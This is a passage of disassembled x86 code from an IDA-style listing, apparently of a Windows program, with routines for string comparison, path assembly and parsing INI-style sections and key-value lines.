loc_4D173C: ; CODE XREF: sub_4D153F+1BA�j
cmp [ebp+var_40], 0
jle short loc_4D174B
mov eax, [ebp+var_44]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D1752
; ---------------------------------------------------------------------------
loc_4D174B: ; CODE XREF: sub_4D153F+201�j
mov eax, [ebp+var_44]
dec eax
mov [ebp+var_2C], eax
loc_4D1752: ; CODE XREF: sub_4D153F+1FB�j
; sub_4D153F+20A�j
jmp loc_4D16B2
; ---------------------------------------------------------------------------
loc_4D1757: ; CODE XREF: sub_4D153F+179�j
; sub_4D153F+1F2�j
cmp [ebp+var_30], 0
jz loc_4D1815
cmp [ebp+arg_4], 0
jz short loc_4D176F
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_30]
mov [eax], ecx
loc_4D176F: ; CODE XREF: sub_4D153F+226�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_28]
mov [ebp+var_54], eax
loc_4D177F: ; CODE XREF: sub_4D153F+272�j
mov eax, [ebp+var_54]
mov al, [eax]
mov [ebp+var_55], al
mov ecx, [ebp+var_50]
cmp al, [ecx]
jnz short loc_4D17B9
cmp [ebp+var_55], 0
jz short loc_4D17B3
mov eax, [ebp+var_54]
mov al, [eax+1]
mov [ebp+var_56], al
mov ecx, [ebp+var_50]
cmp al, [ecx+1]
jnz short loc_4D17B9
add [ebp+var_54], 2
add [ebp+var_50], 2
cmp [ebp+var_56], 0
jnz short loc_4D177F
loc_4D17B3: ; CODE XREF: sub_4D153F+253�j
and [ebp+var_5C], 0
jmp short loc_4D17C1
; ---------------------------------------------------------------------------
loc_4D17B9: ; CODE XREF: sub_4D153F+24D�j
; sub_4D153F+264�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_5C], eax
loc_4D17C1: ; CODE XREF: sub_4D153F+278�j
mov eax, [ebp+var_5C]
mov [ebp+var_60], eax
cmp [ebp+var_60], 0
jnz short loc_4D17D5
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
jmp short loc_4D17DB
; ---------------------------------------------------------------------------
loc_4D17D5: ; CODE XREF: sub_4D153F+28C�j
mov eax, [ebp+arg_8]
mov byte ptr [eax], 1
loc_4D17DB: ; CODE XREF: sub_4D153F+294�j
cmp [ebp+arg_C], 0
jz short loc_4D17FA
push 0
mov eax, ds:dword_4E1908
add eax, 810h
push eax
call sub_4D92CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4D17FA: ; CODE XREF: sub_4D153F+2A0�j
push 0FFFFFFFFh
mov eax, [ebp+var_30]
mov [ebp+var_64], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_4D18BE
; ---------------------------------------------------------------------------
loc_4D1815: ; CODE XREF: sub_4D153F+21C�j
jmp loc_4D18A5
; ---------------------------------------------------------------------------
loc_4D181A: ; CODE XREF: sub_4D153F+11C�j
; sub_4D153F+134�j
push [ebp+var_1C]
call sub_4D8A16
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4D18A5
mov eax, ds:dword_4E1908
mov eax, [eax+8]
cmp eax, [ebp+var_48]
ja short loc_4D18A5
mov eax, ds:dword_4E1908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_4E1908
mov ecx, [ecx+8]
add ecx, eax
cmp [ebp+var_48], ecx
jnb short loc_4D18A5
mov eax, [ebp+var_48]
mov [ebp+var_4C], eax
mov eax, [ebp+arg_8]
and byte ptr [eax], 0
cmp [ebp+arg_C], 0
jz short loc_4D187F
push 0
mov eax, ds:dword_4E1908
add eax, 810h
push eax
call sub_4D92CA
pop ecx
pop ecx
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4D187F: ; CODE XREF: sub_4D153F+325�j
cmp [ebp+arg_4], 0
jz short loc_4D188D
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4C]
mov [eax], ecx
loc_4D188D: ; CODE XREF: sub_4D153F+344�j
push 0FFFFFFFFh
mov eax, [ebp+var_48]
mov [ebp+var_68], eax
lea eax, [ebp+var_10]
push eax
call sub_4CC496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp short loc_4D18BE
; ---------------------------------------------------------------------------
loc_4D18A5: ; CODE XREF: sub_4D153F+97�j
; sub_4D153F:loc_4D1815�j ...
or [ebp+var_4], 0FFFFFFFFh
call sub_4D18B0
jmp short loc_4D18BC
sub_4D153F endp
; =============== S U B R O U T I N E =======================================
sub_4D18B0 proc near ; CODE XREF: sub_4D153F+36A�p
; DATA XREF: _5:004DE3E0�o
push offset dword_4E18C8
call ds:dword_4E1754 ; RtlLeaveCriticalSection
retn
sub_4D18B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D153F
loc_4D18BC: ; CODE XREF: sub_4D153F+36F�j
xor eax, eax
loc_4D18BE: ; CODE XREF: sub_4D153F+3C�j
; sub_4D153F+2D1�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 10h
; END OF FUNCTION CHUNK FOR sub_4D153F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D18CF proc near ; CODE XREF: sub_4DAAEB+16�p
; sub_4DAB3D+97�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
and [ebp+var_C], 0
and [ebp+var_8], 0
push 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_4D153F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz loc_4D19C6
movzx eax, [ebp+var_C]
test eax, eax
jnz loc_4D19C6
cmp [ebp+var_8], 0
jz loc_4D19C6
mov eax, [ebp+var_8]
mov edi, [eax+4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_10], ecx
mov eax, ds:dword_4E1908
mov eax, [eax+0C14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+1]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
cmp eax, [ebp+arg_8]
jle short loc_4D194F
mov eax, [ebp+var_14]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_4D19C1
; ---------------------------------------------------------------------------
loc_4D194F: ; CODE XREF: sub_4D18CF+73�j
mov eax, ds:dword_4E1908
mov ecx, [eax+0C14h]
mov esi, ds:dword_4E1908
add esi, 10h
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_10]
mov eax, [ebp+var_8]
mov esi, [eax+4]
mov eax, ds:dword_4E1908
mov edi, [ebp+arg_4]
add edi, [eax+0C14h]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, ds:dword_4E1908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_4]
and byte ptr [ecx+eax], 0
mov eax, ds:dword_4E1908
mov eax, [eax+0C14h]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_4D19C1: ; CODE XREF: sub_4D18CF+7E�j
push 1
pop eax
jmp short loc_4D19CE
; ---------------------------------------------------------------------------
loc_4D19C6: ; CODE XREF: sub_4D18CF+29�j
; sub_4D18CF+35�j ...
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
xor eax, eax
loc_4D19CE: ; CODE XREF: sub_4D18CF+F5�j
pop edi
pop esi
leave
retn
sub_4D18CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D19D2 proc near ; CODE XREF: sub_4D581E+3D�p
; sub_4DA1C7+29�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004D1A9F SIZE 00000043 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE3E8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_34], edx
mov [ebp+var_30], ecx
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_30]
call sub_4D153F
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz loc_4D1A9F
cmp [ebp+arg_0], 0
jz short loc_4D1A9F
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_30]
call sub_4D92CA
pop ecx
pop ecx
mov edx, eax
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
mov edx, edi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov [ebp+var_24], edx
and [ebp+var_4], 0
push [ebp+var_34]
lea eax, [ebp+var_20]
push eax
push 0
push [ebp+var_24]
call sub_4D153F
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_4D1A8F
jmp short loc_4D1A9F
sub_4D19D2 endp
; =============== S U B R O U T I N E =======================================
sub_4D1A8F proc near ; CODE XREF: sub_4D19D2+B6�p
; DATA XREF: _5:004DE3F0�o
mov eax, [ebp-24h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4D83DD
pop ecx
retn
sub_4D1A8F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4D19D2
loc_4D1A9F: ; CODE XREF: sub_4D19D2+43�j
; sub_4D19D2+4D�j ...
cmp [ebp+var_1C], 0
jz short loc_4D1AB2
movzx eax, [ebp+var_20]
test eax, eax
jnz short loc_4D1AB2
mov eax, [ebp+var_1C]
jmp short loc_4D1AD1
; ---------------------------------------------------------------------------
loc_4D1AB2: ; CODE XREF: sub_4D19D2+D1�j
; sub_4D19D2+D9�j
cmp [ebp+var_34], 0
jz short loc_4D1ACF
cmp [ebp+var_1C], 0
jz short loc_4D1ACF
mov eax, [ebp+var_34]
mov eax, [eax]
mov [ebp+var_2C], eax
push [ebp+var_2C]
call sub_4D83DD
pop ecx
loc_4D1ACF: ; CODE XREF: sub_4D19D2+E4�j
; sub_4D19D2+EA�j
xor eax, eax
loc_4D1AD1: ; CODE XREF: sub_4D19D2+DE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_4D19D2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1AE2 proc near ; CODE XREF: sub_4D581E+24�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_28], edx
mov [ebp+var_24], ecx
and [ebp+var_8], 0
cmp [ebp+var_24], 0
jz loc_4D1BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jz loc_4D1BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jz loc_4D1BBB
mov eax, [ebp+var_24]
movsx eax, byte ptr [eax+1]
cmp eax, 3Ah
jz loc_4D1BBB
mov edi, [ebp+var_24]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_14], ecx
mov eax, ds:dword_4E1908
add eax, 10h
mov ecx, ds:dword_4E1908
mov ecx, [ecx+0C10h]
sub ecx, eax
mov [ebp+var_10], ecx
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov eax, [ebp+var_14]
lea eax, [eax+ecx+104h]
push eax
call sub_4D835A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
mov ecx, [ebp+var_10]
mov esi, ds:dword_4E1908
add esi, 10h
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_14]
inc ecx
mov esi, [ebp+var_24]
mov edi, [ebp+var_8]
add edi, [ebp+var_10]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
loc_4D1BBB: ; CODE XREF: sub_4D1AE2+17�j
; sub_4D1AE2+26�j ...
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_24]
call sub_4D153F
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4D1C41
cmp [ebp+arg_0], 0
jz short loc_4D1C41
cmp [ebp+var_8], 0
jnz short loc_4D1BFB
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push [ebp+var_24]
call sub_4D92CA
pop ecx
pop ecx
mov [ebp+var_8], eax
loc_4D1BFB: ; CODE XREF: sub_4D1AE2+FC�j
mov edi, [ebp+arg_0]
mov edx, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
dec edi
mov ecx, ebx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
mov [ebp+var_24], eax
push 0
lea eax, [ebp+var_C]
push eax
push 0
push [ebp+var_8]
call sub_4D153F
mov [ebp+var_4], eax
loc_4D1C41: ; CODE XREF: sub_4D1AE2+F0�j
; sub_4D1AE2+F6�j
cmp [ebp+var_4], 0
jz short loc_4D1C90
movzx eax, [ebp+var_C]
test eax, eax
jnz short loc_4D1C90
cmp [ebp+var_28], 0
jz short loc_4D1C7C
cmp [ebp+var_8], 0
jz short loc_4D1C63
mov eax, [ebp+var_8]
mov [ebp+var_2C], eax
jmp short loc_4D1C72
; ---------------------------------------------------------------------------
loc_4D1C63: ; CODE XREF: sub_4D1AE2+177�j
push 0
push [ebp+var_24]
call sub_4D92CA
pop ecx
pop ecx
mov [ebp+var_2C], eax
loc_4D1C72: ; CODE XREF: sub_4D1AE2+17F�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_2C]
mov [eax], ecx
jmp short loc_4D1C8B
; ---------------------------------------------------------------------------
loc_4D1C7C: ; CODE XREF: sub_4D1AE2+171�j
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_4D83DD
pop ecx
loc_4D1C8B: ; CODE XREF: sub_4D1AE2+198�j
mov eax, [ebp+var_4]
jmp short loc_4D1CA1
; ---------------------------------------------------------------------------
loc_4D1C90: ; CODE XREF: sub_4D1AE2+163�j
; sub_4D1AE2+16B�j
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
push [ebp+var_20]
call sub_4D83DD
pop ecx
xor eax, eax
loc_4D1CA1: ; CODE XREF: sub_4D1AE2+1AC�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_4D1AE2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1CA8 proc near ; CODE XREF: sub_4DA7AF+A�p
; sub_4DA7DD+78�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
push 0
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_4D153F
leave
retn
sub_4D1CA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D1CC4 proc near ; CODE XREF: sub_4DAC66+2B�p
; sub_4DAD0C+42�p ...
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = byte ptr 20h
; FUNCTION CHUNK AT 004D21B6 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4DE3F8
push offset sub_4CC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 64h
push ebx
push esi
push edi
and [ebp+var_34], 0
and [ebp+var_28], 0
and [ebp+var_38], 0
and [ebp+var_20], 0
and [ebp+var_30], 0
and [ebp+var_3C], 0
and [ebp+var_24], 0
and [ebp+var_48], 0
and [ebp+var_40], 0
and [ebp+var_44], 0
and [ebp+var_4], 0
mov ecx, [ebp+arg_10]
xor eax, eax
mov edi, [ebp+arg_C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 0
lea eax, [ebp+var_2C]
push eax
push 0
push 0
push [ebp+arg_14]
call sub_4D0346
lea eax, [ebp+var_28]
push eax
push [ebp+var_2C]
call sub_4D0672
mov eax, [ebp+var_28]
inc eax
push eax
call sub_4D835A
pop ecx
mov [ebp+var_64], eax
mov eax, [ebp+var_64]
mov [ebp+var_34], eax
mov ecx, [ebp+var_28]
inc ecx
xor eax, eax
mov edi, [ebp+var_34]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov eax, [ebp+var_28]
mov ecx, [ebp+var_34]
lea eax, [ecx+eax+1]
mov [ebp+var_20], eax
mov eax, [ebp+var_34]
mov [ebp+var_38], eax
lea eax, [ebp+var_1C]
push eax
push 0
push 0
push [ebp+var_28]
push [ebp+var_34]
push [ebp+var_2C]
call sub_4D1177
mov eax, [ebp+var_20]
mov byte ptr [eax-1], 0Ah
jmp short loc_4D1DAD
; ---------------------------------------------------------------------------
loc_4D1DA6: ; CODE XREF: sub_4D1CC4:loc_4D2184�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_4D1DAD: ; CODE XREF: sub_4D1CC4+E0�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz loc_4D2189
loc_4D1DB9: ; CODE XREF: sub_4D1CC4+486�j
; sub_4D1CC4+4BB�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Bh
jnz short loc_4D1DF8
loc_4D1DC4: ; CODE XREF: sub_4D1CC4+125�j
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jz short loc_4D1DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D1DEB
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D1DEB
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D1DC4
; ---------------------------------------------------------------------------
loc_4D1DEB: ; CODE XREF: sub_4D1CC4+106�j
; sub_4D1CC4+111�j ...
mov eax, [ebp+var_38]
cmp eax, [ebp+var_20]
jnz short loc_4D1DF8
jmp loc_4D2189
; ---------------------------------------------------------------------------
loc_4D1DF8: ; CODE XREF: sub_4D1CC4+FE�j
; sub_4D1CC4+12D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Bh
jnz short loc_4D1E16
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_30], eax
mov [ebp+var_24], 1
jmp loc_4D2184
; ---------------------------------------------------------------------------
loc_4D1E16: ; CODE XREF: sub_4D1CC4+13D�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 5Dh
jnz loc_4D1EBF
loc_4D1E25: ; CODE XREF: sub_4D1CC4+217�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
cmp [ebp+var_24], 1
jnz loc_4D1EBA
and [ebp+var_24], 0
cmp [ebp+arg_0], 0
jnz short loc_4D1EA0
mov eax, [ebp+var_44]
mov [ebp+var_4C], eax
mov edi, [ebp+var_30]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_54], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_4C]
mov [ebp+var_50], eax
cmp [ebp+var_50], 0
jle short loc_4D1E9E
push [ebp+var_50]
push [ebp+var_30]
mov eax, [ebp+arg_C]
add eax, [ebp+var_4C]
push eax
call sub_4CC770
add esp, 0Ch
mov eax, [ebp+var_50]
cmp eax, [ebp+var_54]
jle short loc_4D1E8B
mov eax, [ebp+var_54]
mov [ebp+var_74], eax
jmp short loc_4D1E91
; ---------------------------------------------------------------------------
loc_4D1E8B: ; CODE XREF: sub_4D1CC4+1BD�j
mov eax, [ebp+var_50]
mov [ebp+var_74], eax
loc_4D1E91: ; CODE XREF: sub_4D1CC4+1C5�j
mov eax, [ebp+var_74]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+1]
mov [ebp+var_44], eax
loc_4D1E9E: ; CODE XREF: sub_4D1CC4+1A0�j
jmp short loc_4D1EBA
; ---------------------------------------------------------------------------
loc_4D1EA0: ; CODE XREF: sub_4D1CC4+179�j
push [ebp+var_30]
push [ebp+arg_0]
call ds:dword_4E17C0 ; lstrcmpi
test eax, eax
jnz short loc_4D1EB6
mov [ebp+var_48], 1
jmp short loc_4D1EBA
; ---------------------------------------------------------------------------
loc_4D1EB6: ; CODE XREF: sub_4D1CC4+1EA�j
and [ebp+var_48], 0
loc_4D1EBA: ; CODE XREF: sub_4D1CC4+16B�j
; sub_4D1CC4:loc_4D1E9E�j ...
jmp loc_4D2184
; ---------------------------------------------------------------------------
loc_4D1EBF: ; CODE XREF: sub_4D1CC4+15B�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D1ED5
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4D1EEC
loc_4D1ED5: ; CODE XREF: sub_4D1CC4+204�j
cmp [ebp+var_24], 1
jnz short loc_4D1EE0
jmp loc_4D1E25
; ---------------------------------------------------------------------------
loc_4D1EE0: ; CODE XREF: sub_4D1CC4+215�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
jmp loc_4D2184
; ---------------------------------------------------------------------------
loc_4D1EEC: ; CODE XREF: sub_4D1CC4+20F�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_4D2184
cmp [ebp+arg_0], 0
jz loc_4D2151
mov eax, [ebp+var_38]
mov byte ptr [eax], 20h
loc_4D1F0B: ; CODE XREF: sub_4D1CC4+266�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 9
jz short loc_4D1F23
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_4D1F2C
loc_4D1F23: ; CODE XREF: sub_4D1CC4+251�j
mov eax, [ebp+var_38]
dec eax
mov [ebp+var_38], eax
jmp short loc_4D1F0B
; ---------------------------------------------------------------------------
loc_4D1F2C: ; CODE XREF: sub_4D1CC4+25D�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
loc_4D1F39: ; CODE XREF: sub_4D1CC4+292�j
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 9
jz short loc_4D1F4F
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_4D1F58
loc_4D1F4F: ; CODE XREF: sub_4D1CC4+27E�j
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D1F39
; ---------------------------------------------------------------------------
loc_4D1F58: ; CODE XREF: sub_4D1CC4+289�j
cmp [ebp+arg_4], 0
jnz loc_4D20A1
movzx eax, [ebp+var_48]
test eax, eax
jz loc_4D209C
mov eax, [ebp+var_44]
mov [ebp+var_58], eax
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_6C], eax
mov eax, [ebp+var_6C]
cmp eax, [ebp+var_60]
jge short loc_4D1F9F
mov eax, [ebp+var_6C]
mov [ebp+var_78], eax
jmp short loc_4D1FA5
; ---------------------------------------------------------------------------
loc_4D1F9F: ; CODE XREF: sub_4D1CC4+2D1�j
mov eax, [ebp+var_60]
mov [ebp+var_78], eax
loc_4D1FA5: ; CODE XREF: sub_4D1CC4+2D9�j
mov eax, [ebp+var_78]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_4D1FD4
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_4D1FD4: ; CODE XREF: sub_4D1CC4+2EB�j
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_4D1FDA: ; CODE XREF: sub_4D1CC4+33C�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D2002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D2002
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D2002
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_38], eax
jmp short loc_4D1FDA
; ---------------------------------------------------------------------------
loc_4D2002: ; CODE XREF: sub_4D1CC4+31D�j
; sub_4D1CC4+328�j ...
movzx eax, [ebp+arg_18]
test eax, eax
jz loc_4D208E
mov eax, [ebp+arg_10]
dec eax
dec eax
cmp [ebp+var_58], eax
jnb short loc_4D2028
mov eax, [ebp+arg_C]
add eax, [ebp+var_58]
mov byte ptr [eax], 3Dh
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_58], eax
loc_4D2028: ; CODE XREF: sub_4D1CC4+352�j
mov eax, [ebp+var_38]
and byte ptr [eax], 0
mov edi, [ebp+var_3C]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_60], ecx
mov eax, [ebp+arg_10]
dec eax
dec eax
sub eax, [ebp+var_58]
mov [ebp+var_70], eax
mov eax, [ebp+var_70]
cmp eax, [ebp+var_60]
jge short loc_4D2059
mov eax, [ebp+var_70]
mov [ebp+var_7C], eax
jmp short loc_4D205F
; ---------------------------------------------------------------------------
loc_4D2059: ; CODE XREF: sub_4D1CC4+38B�j
mov eax, [ebp+var_60]
mov [ebp+var_7C], eax
loc_4D205F: ; CODE XREF: sub_4D1CC4+393�j
mov eax, [ebp+var_7C]
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jle short loc_4D208E
mov ecx, [ebp+var_5C]
mov esi, [ebp+var_3C]
mov edi, [ebp+arg_C]
add edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_58]
add eax, [ebp+var_5C]
mov [ebp+var_58], eax
loc_4D208E: ; CODE XREF: sub_4D1CC4+344�j
; sub_4D1CC4+3A5�j
mov eax, [ebp+var_58]
inc eax
mov [ebp+var_44], eax
mov eax, [ebp+var_38]
inc eax
mov [ebp+var_3C], eax
loc_4D209C: ; CODE XREF: sub_4D1CC4+2A4�j
jmp loc_4D214F
; ---------------------------------------------------------------------------
loc_4D20A1: ; CODE XREF: sub_4D1CC4+298�j
push [ebp+var_3C]
push [ebp+arg_4]
call ds:dword_4E17C0 ; lstrcmpi
test eax, eax
jnz short loc_4D211C
movzx eax, [ebp+var_48]
test eax, eax
jz short loc_4D211C
mov eax, [ebp+var_38]
mov [ebp+var_3C], eax
loc_4D20BF: ; CODE XREF: sub_4D1CC4+421�j
mov eax, [ebp+var_20]
dec eax
cmp [ebp+var_38], eax
jz short loc_4D20E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_4D20E7
mov eax, [ebp+var_38]
movzx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4D20E7
